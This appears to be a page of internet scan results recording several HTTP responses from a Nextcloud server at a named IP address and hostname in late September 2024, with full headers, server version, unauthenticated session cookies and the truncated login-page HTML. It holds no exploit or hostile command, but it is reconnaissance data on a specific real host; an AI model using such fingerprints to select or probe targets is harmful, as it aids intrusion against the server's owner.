src="/dist/core-common.js?v=ccbf35ac-1"></script> <script nonce="aE10MUJETERJWEx2MnNmM3hoMmZITGk2MjZ3eUM0R3g2R1M3K21RbGlZZz06MVAxZVlHdUdWamFhN0ltQmtrV3NST0tJbjV4RVplekNxeWpvanhadTZyQT0=" defer src="/dist/core-main.js?v=ccbf35ac-1"></script> <script nonce="aE10MUJETERJWEx2MnNmM3hoMmZITGk2MjZ3eUM0R3g2R1M3K21RbGlZZz06MVAxZVlHdUdWamFhN0ltQmtrV3NST0tJbjV4RVplekNxeWpvanhadTZyQT0=" defer src="/dist/core-files_fileinfo.js?v=ccbf35ac-1"></script> <script nonce="aE10MUJETERJWEx2MnNmM3hoMmZITGk2MjZ3eUM0R3g2R1M3K21RbGlZZz06MVAxZVlHdUdWamFhN0ltQmtrV3NST0tJbjV4RVplekNxeWpvanhadTZyQT0=" defer src="/dist/core-files_client.js?v=ccbf35ac-1"></script> <script nonce="aE10MUJETERJWEx2MnNmM3hoMmZITGk2MjZ3eUM0R3g2R1M3K21RbGlZZz06MVAxZVlHdUdWamFhN0ltQmtrV3NST0tJbjV4RVplekNxeWpvanhadTZyQT0=" defer src="/index.php/js/core/merged-template-prepend.js?v=ccbf35ac-1"></script> <script nonce="aE10MUJETERJWEx2MnNmM3hoMmZITGk2MjZ3eUM0R3g2R1M3K21RbGlZZz06MVAxZVlHdUdWamFhN0ltQmtrV3NST0tJbjV4RVplekNxeWpvanhadTZyQT0=" defer src="/core/js/backgroundjobs.js?v=ccbf35ac-1"></script> <script nonce="aE10MUJETERJWEx2MnNmM3hoMmZITGk2MjZ3eUM0R3g2R1M3K21RbGlZZz06MVAxZVlHdUdWamFhN0ltQmtrV3NST0tJbjV4RVplekNxeWpvanhadTZyQT0="> var _oc_debug=false; var _oc_isadmin=false; var backendAllowsPasswordConfirmation=true; var oc_dataURL=false; var _oc_webroot=""; var _oc_appswebroots={"activity":"/apps/activity","calendar":"/apps/calendar","circles":"/apps/circles","cloud_federation_api":"/apps/cloud_federation_api","comments":"/apps/comments","contacts":"/apps/contacts","contactsinteraction":"/apps/contactsinteraction","dashboard":"/apps/dashboard","dav":"/apps/dav","federatedfilesharing":"/apps/federatedfilesharing","federation":"/apps/federation","files":"/apps/files","files_pdfviewer":"/apps/files_pdfviewer","files_rightclick":"/apps/files_rightclick","files_sharing":"/apps/files_sharing","files_trashbin":"/apps/files_trashbin","files_versions":"/apps/files_versions","firstrunwizard":"/apps/firstrunwizard","logreader":"/apps/logreader","lookup_server_connector":"/apps/lookup_server_connector","mail":"/apps/mail","nextcloud_announcements":"/apps/nextcloud_announcements","notifications":"/apps/notifications","oauth2":"/apps/oauth2","password_policy":"/apps/password_policy","photos":"/apps/photos","privacy":"/apps/privacy","provisioning_api":"/apps/provisioning_api","recommendations":"/apps/recommendations","related_resources":"/apps/related_resources","richdocuments":"/apps/richdocuments","serverinfo":"/apps/serverinfo","settings":"/apps/settings","sharebymail":"/apps/sharebymail","spreed":"/apps/spreed","support":"/apps/support","survey_client":"/apps/survey_client","systemtags":"/apps/systemtags","text":"/apps/text","theming":"/apps/theming","twofactor_backupcodes":"/apps/twofactor_backupcodes","updatenotification":"/apps/updatenotification","user_status":"/apps/user_status","viewer":"/apps/viewer","weather_status":"/apps/weather_status","workflowengine":"/apps/workflowengine"}; var datepickerFormatDate="M\/d\/y
Open service 109.190.179.92:443 · ravignon.mycloud.paris
2024-09-30 14:32
HTTP/1.1 302 Found Date: Mon, 30 Sep 2024 14:32:21 GMT Server: Apache/2.4.52 (Ubuntu) Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-TGdZaklGYkU3MVZWWmU2U2VGZHJIcE9tdThJdG92cjJQTmlOUjUrSE0zRT06UmtGM1VUKzBweEl5STkzaUlpQlpTTW4yOXJSTG1zdTdDcmZrTFBUWFNqUT0='; style-src 'self' 'unsafe-inline'; frame-src *; img-src * data: blob:; font-src 'self' data:; media-src *; connect-src *; object-src 'none'; base-uri 'self'; Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: oc_sessionPassphrase=Y3kMMVSTPR%2BMVO57zmpumsjw%2FVXRTBYNEYYfFSkSuw%2FQfuFxJ3GA0dmWrCwi5WpWiSpBnspCSu4%2BhOImPdVBDgXY7u1176WqQa1ASNZ10%2BaEi8HpHi5LMXKnMPcgErxi; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: __Host-nc_sameSiteCookielax=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=lax Set-Cookie: __Host-nc_sameSiteCookiestrict=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=strict Set-Cookie: ocfyh1p0sac1=8n1mui9tgtrks51v96rgctuoq6; path=/; secure; HttpOnly; SameSite=Lax Referrer-Policy: no-referrer X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: none X-XSS-Protection: 1; mode=block Upgrade: h2,h2c Connection: Upgrade, close Location: https://ravignon.mycloud.paris/index.php/login Content-Length: 0 Content-Type: text/html; charset=UTF-8
Open service 109.190.179.92:443
2024-09-29 21:25
HTTP/1.1 400 Bad Request Date: Sun, 29 Sep 2024 21:25:40 GMT Server: Apache/2.4.52 (Ubuntu) Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-N2hWSGNxTzJoQzA5SFpvcVFwcWJmWDlwdzNianJILzRDWkpHeXZkVGpvMD06MTBjVkVJeWR0SDV5ZWZWdk5PN01OajBtampHaXhCYThUTU1Sazc1aDIvYz0='; style-src 'self' 'unsafe-inline'; frame-src *; img-src * data: blob:; font-src 'self' data:; media-src *; connect-src *; object-src 'none'; base-uri 'self'; Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: oc_sessionPassphrase=eAxb5OPWVNHpW%2BqQ4r8fPnSmOgQQoNIHGvzKkWyLMPgzeK9npgcG3a5XHxptoFQPRNx2oSP5GkbjvbrQ%2BHdU9JC3aytddgw0Z6KlQqi4L503LrYoMcniqHUBpecfUxmC; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: __Host-nc_sameSiteCookielax=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=lax Set-Cookie: __Host-nc_sameSiteCookiestrict=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=strict Set-Cookie: ocfyh1p0sac1=a1mird2duh1dkvr49tkjhsrbso; path=/; secure; HttpOnly; SameSite=Lax Referrer-Policy: no-referrer X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: none X-XSS-Protection: 1; mode=block Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Page title: Nextcloud <!DOCTYPE html> <html class="ng-csp" data-placeholder-focus="false" lang="en" data-locale="en" > <head data-requesttoken="7hVHcqO2hC09HZoqQpqbfX9pw3bjrH/4CZJGyvdTjo0=:10cVEIydtH5yefVvNO7MNj0mjjGixBa8TMMRk75h2/c="> <meta charset="utf-8"> <title> Nextcloud </title> <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0"> <meta name="apple-itunes-app" content="app-id=1125420102"> <meta name="theme-color" content="#0082c9"> <link rel="icon" href="/core/img/favicon.ico"> <link rel="apple-touch-icon" href="/core/img/favicon-touch.png"> <link rel="mask-icon" sizes="any" href="/core/img/favicon-mask.svg" color="#0082c9"> <link rel="manifest" href="/core/img/manifest.json"> <link rel="stylesheet" href="/core/css/server.css?v=ccbf35ac-1"> <link rel="stylesheet" href="/apps/theming/css/default.css?v=d233662f-1"> <link rel="stylesheet" href="/core/css/guest.css?v=ccbf35ac-1"> <script nonce="N2hWSGNxTzJoQzA5SFpvcVFwcWJmWDlwdzNianJILzRDWkpHeXZkVGpvMD06MTBjVkVJeWR0SDV5ZWZWdk5PN01OajBtampHaXhCYThUTU1Sazc1aDIvYz0=" defer src="/dist/core-common.js?v=ccbf35ac-1"></script> <script nonce="N2hWSGNxTzJoQzA5SFpvcVFwcWJmWDlwdzNianJILzRDWkpHeXZkVGpvMD06MTBjVkVJeWR0SDV5ZWZWdk5PN01OajBtampHaXhCYThUTU1Sazc1aDIvYz0=" defer src="/dist/core-main.js?v=ccbf35ac-1"></script> <script nonce="N2hWSGNxTzJoQzA5SFpvcVFwcWJmWDlwdzNianJILzRDWkpHeXZkVGpvMD06MTBjVkVJeWR0SDV5ZWZWdk5PN01OajBtampHaXhCYThUTU1Sazc1aDIvYz0=" defer src="/dist/core-files_fileinfo.js?v=ccbf35ac-1"></script> <script nonce="N2hWSGNxTzJoQzA5SFpvcVFwcWJmWDlwdzNianJILzRDWkpHeXZkVGpvMD06MTBjVkVJeWR0SDV5ZWZWdk5PN01OajBtampHaXhCYThUTU1Sazc1aDIvYz0=" defer src="/dist/core-files_client.js?v=ccbf35ac-1"></script> <script nonce="N2hWSGNxTzJoQzA5SFpvcVFwcWJmWDlwdzNianJILzRDWkpHeXZkVGpvMD06MTBjVkVJeWR0SDV5ZWZWdk5PN01OajBtampHaXhCYThUTU1Sazc1aDIvYz0=" defer src="/index.php/js/core/merged-template-prepend.js?v=ccbf35ac-1"></script> <script nonce="N2hWSGNxTzJoQzA5SFpvcVFwcWJmWDlwdzNianJILzRDWkpHeXZkVGpvMD06MTBjVkVJeWR0SDV5ZWZWdk5PN01OajBtampHaXhCYThUTU1Sazc1aDIvYz0=" defer src="/core/js/backgroundjobs.js?v=ccbf35ac-1"></script> <script nonce="N2hWSGNxTzJoQzA5SFpvcVFwcWJmWDlwdzNianJILzRDWkpHeXZkVGpvMD06MTBjVkVJeWR0SDV5ZWZWdk5PN01OajBtampHaXhCYThUTU1Sazc1aDIvYz0="> var _oc_debug=false; var _oc_isadmin=false; var backendAllowsPasswordConfirmation=true; var oc_dataURL=false; var _oc_webroot=""; var _oc_appswebroots={"activity":"/apps/activity","calendar":"/apps/calendar","circles":"/apps/circles","cloud_federation_api":"/apps/cloud_federation_api","comments":"/apps/comments","contacts":"/apps/contacts","contactsinteraction":"/apps/contactsinteraction","dashboard":"/apps/dashboard","dav":"/apps/dav","federatedfilesharing":"/apps/federatedfilesharing","federation":"/apps/federation","files":"/apps/files","files_pdfviewer":"/apps/files_pdfviewer","files_rightclick":"/apps/files_rightclick","files_sharing":"/apps/files_sharing","files_trashbin":"/apps/files_trashbin","files_versions":"/apps/files_versions","firstrunwizard":"/apps/firstrunwizard","logreader":"/apps/logreader","lookup_server_connector":"/apps/lookup_server_connector","mail":"/apps/mail","nextcloud_announcements":"/apps/nextcloud_announcements","notifications":"/apps/notifications","oauth2":"/apps/oauth2","password_policy":"/apps/password_policy","photos":"/apps/photos","privacy":"/apps/privacy","provisioning_api":"/apps/provisioning_api","recommendations":"/apps/recommendations","related_resources":"/apps/related_resources","richdocuments":"/apps/richdocuments","serverinfo":"/apps/serverinfo","settings":"/apps/settings","sharebymail":"/apps/sharebymail","spreed":"/apps/spreed","support":"/apps/support","survey_client":"/apps/survey_client","systemtags":"/apps/systemtags","text":"/apps/text","theming":"/apps/theming","twofactor_backupcodes":"/apps/twofactor_backupcodes","updatenotification":"/apps/updatenotification","user_status":"/apps/user_status","viewer":"/apps/viewer","weather_status":"/apps/weather_status","workflowengine":"/apps/workflowengine"}; var datepickerFormatDate="M\/d\/y
Open service 109.190.179.92:443 · ravignon.mycloud.paris
2024-09-28 18:25
HTTP/1.1 302 Found Date: Sat, 28 Sep 2024 18:25:46 GMT Server: Apache/2.4.52 (Ubuntu) Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-T2I5WkgvaEhTVUQxVnR6YkZjMDg0VDBqdFk4OEhENzlJbmg0T2VUM2Ezbz06Y1B3WVNLMXlCeGJFSHAySWR2bDRpRnAzL01kVWEzZUVjelEvRGF5VklSQT0='; style-src 'self' 'unsafe-inline'; frame-src *; img-src * data: blob:; font-src 'self' data:; media-src *; connect-src *; object-src 'none'; base-uri 'self'; Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: oc_sessionPassphrase=GCgUHA%2F%2FgSCqU4R%2BOJ4dap2CeDvUSl53sdnrW%2BMSJk1%2Bck%2BDg5AAjmUpgAo4qHq2BcIoH7IEkxppDKA1JCF9fokdgkdyDsFPLSR%2BnBJPv1bfbCBMVug7WZp73gGpp5tq; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: __Host-nc_sameSiteCookielax=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=lax Set-Cookie: __Host-nc_sameSiteCookiestrict=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=strict Set-Cookie: ocfyh1p0sac1=nf9nr3b69pu8e3ooocag830iuu; path=/; secure; HttpOnly; SameSite=Lax Referrer-Policy: no-referrer X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: none X-XSS-Protection: 1; mode=block Upgrade: h2,h2c Connection: Upgrade, close Location: https://ravignon.mycloud.paris/index.php/login Content-Length: 0 Content-Type: text/html; charset=UTF-8
Open service 109.190.179.92:443
2024-09-27 22:02
HTTP/1.1 400 Bad Request Date: Fri, 27 Sep 2024 22:02:01 GMT Server: Apache/2.4.52 (Ubuntu) Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-eEpKNHRoY0xaOS9QZGE0a2J4MTVVbUZUdytaeUdTaS9oTCtFbFJqQW45RT06ODlrMmczQmNEcnIzSFBaaExGd2ROZ3hoZ3BJVGRIdlQ0NG15NTMrVHNLRT0='; style-src 'self' 'unsafe-inline'; frame-src *; img-src * data: blob:; font-src 'self' data:; media-src *; connect-src *; object-src 'none'; base-uri 'self'; Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: oc_sessionPassphrase=vQ4BmO88jzi81zbwO385QA0OupEjoPoOVqFglz5P3e%2FEqu5gtjE2JWOf7MLBGEV8lH5sFfQ2TQauyZ3mOc6Bq8%2F6bPg3%2Bt1X37Oa5Ous6wkdcG7%2B6b5mDL8wTh5cbPuO; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: __Host-nc_sameSiteCookielax=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=lax Set-Cookie: __Host-nc_sameSiteCookiestrict=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=strict Set-Cookie: ocfyh1p0sac1=9oeb75c65ptj4ejgmv8rgm3iik; path=/; secure; HttpOnly; SameSite=Lax Referrer-Policy: no-referrer X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: none X-XSS-Protection: 1; mode=block Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Page title: Nextcloud <!DOCTYPE html> <html class="ng-csp" data-placeholder-focus="false" lang="en" data-locale="en" > <head data-requesttoken="xJJ4thcLZ9/Pda4kbx15UmFTw+ZyGSi/hL+ElRjAn9E=:89k2g3BcDrr3HPZhLFwdNgxhgpITdHvT44my53+TsKE="> <meta charset="utf-8"> <title> Nextcloud </title> <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0"> <meta name="apple-itunes-app" content="app-id=1125420102"> <meta name="theme-color" content="#0082c9"> <link rel="icon" href="/core/img/favicon.ico"> <link rel="apple-touch-icon" href="/core/img/favicon-touch.png"> <link rel="mask-icon" sizes="any" href="/core/img/favicon-mask.svg" color="#0082c9"> <link rel="manifest" href="/core/img/manifest.json"> <link rel="stylesheet" href="/core/css/server.css?v=ccbf35ac-1"> <link rel="stylesheet" href="/apps/theming/css/default.css?v=d233662f-1"> <link rel="stylesheet" href="/core/css/guest.css?v=ccbf35ac-1"> <script nonce="eEpKNHRoY0xaOS9QZGE0a2J4MTVVbUZUdytaeUdTaS9oTCtFbFJqQW45RT06ODlrMmczQmNEcnIzSFBaaExGd2ROZ3hoZ3BJVGRIdlQ0NG15NTMrVHNLRT0=" defer src="/dist/core-common.js?v=ccbf35ac-1"></script> <script nonce="eEpKNHRoY0xaOS9QZGE0a2J4MTVVbUZUdytaeUdTaS9oTCtFbFJqQW45RT06ODlrMmczQmNEcnIzSFBaaExGd2ROZ3hoZ3BJVGRIdlQ0NG15NTMrVHNLRT0=" defer src="/dist/core-main.js?v=ccbf35ac-1"></script> <script nonce="eEpKNHRoY0xaOS9QZGE0a2J4MTVVbUZUdytaeUdTaS9oTCtFbFJqQW45RT06ODlrMmczQmNEcnIzSFBaaExGd2ROZ3hoZ3BJVGRIdlQ0NG15NTMrVHNLRT0=" defer src="/dist/core-files_fileinfo.js?v=ccbf35ac-1"></script> <script nonce="eEpKNHRoY0xaOS9QZGE0a2J4MTVVbUZUdytaeUdTaS9oTCtFbFJqQW45RT06ODlrMmczQmNEcnIzSFBaaExGd2ROZ3hoZ3BJVGRIdlQ0NG15NTMrVHNLRT0=" defer src="/dist/core-files_client.js?v=ccbf35ac-1"></script> <script nonce="eEpKNHRoY0xaOS9QZGE0a2J4MTVVbUZUdytaeUdTaS9oTCtFbFJqQW45RT06ODlrMmczQmNEcnIzSFBaaExGd2ROZ3hoZ3BJVGRIdlQ0NG15NTMrVHNLRT0=" defer src="/index.php/js/core/merged-template-prepend.js?v=ccbf35ac-1"></script> <script nonce="eEpKNHRoY0xaOS9QZGE0a2J4MTVVbUZUdytaeUdTaS9oTCtFbFJqQW45RT06ODlrMmczQmNEcnIzSFBaaExGd2ROZ3hoZ3BJVGRIdlQ0NG15NTMrVHNLRT0=" defer src="/core/js/backgroundjobs.js?v=ccbf35ac-1"></script> <script nonce="eEpKNHRoY0xaOS9QZGE0a2J4MTVVbUZUdytaeUdTaS9oTCtFbFJqQW45RT06ODlrMmczQmNEcnIzSFBaaExGd2ROZ3hoZ3BJVGRIdlQ0NG15NTMrVHNLRT0="> var _oc_debug=false; var _oc_isadmin=false; var backendAllowsPasswordConfirmation=true; var oc_dataURL=false; var _oc_webroot=""; var _oc_appswebroots={"activity":"/apps/activity","calendar":"/apps/calendar","circles":"/apps/circles","cloud_federation_api":"/apps/cloud_federation_api","comments":"/apps/comments","contacts":"/apps/contacts","contactsinteraction":"/apps/contactsinteraction","dashboard":"/apps/dashboard","dav":"/apps/dav","federatedfilesharing":"/apps/federatedfilesharing","federation":"/apps/federation","files":"/apps/files","files_pdfviewer":"/apps/files_pdfviewer","files_rightclick":"/apps/files_rightclick","files_sharing":"/apps/files_sharing","files_trashbin":"/apps/files_trashbin","files_versions":"/apps/files_versions","firstrunwizard":"/apps/firstrunwizard","logreader":"/apps/logreader","lookup_server_connector":"/apps/lookup_server_connector","mail":"/apps/mail","nextcloud_announcements":"/apps/nextcloud_announcements","notifications":"/apps/notifications","oauth2":"/apps/oauth2","password_policy":"/apps/password_policy","photos":"/apps/photos","privacy":"/apps/privacy","provisioning_api":"/apps/provisioning_api","recommendations":"/apps/recommendations","related_resources":"/apps/related_resources","richdocuments":"/apps/richdocuments","serverinfo":"/apps/serverinfo","settings":"/apps/settings","sharebymail":"/apps/sharebymail","spreed":"/apps/spreed","support":"/apps/support","survey_client":"/apps/survey_client","systemtags":"/apps/systemtags","text":"/apps/text","theming":"/apps/theming","twofactor_backupcodes":"/apps/twofactor_backupcodes","updatenotification":"/apps/updatenotification","user_status":"/apps/user_status","viewer":"/apps/viewer","weather_status":"/apps/weather_status","workflowengine":"/apps/workflowengine"}; var datepickerFormatDate="M\/d\/y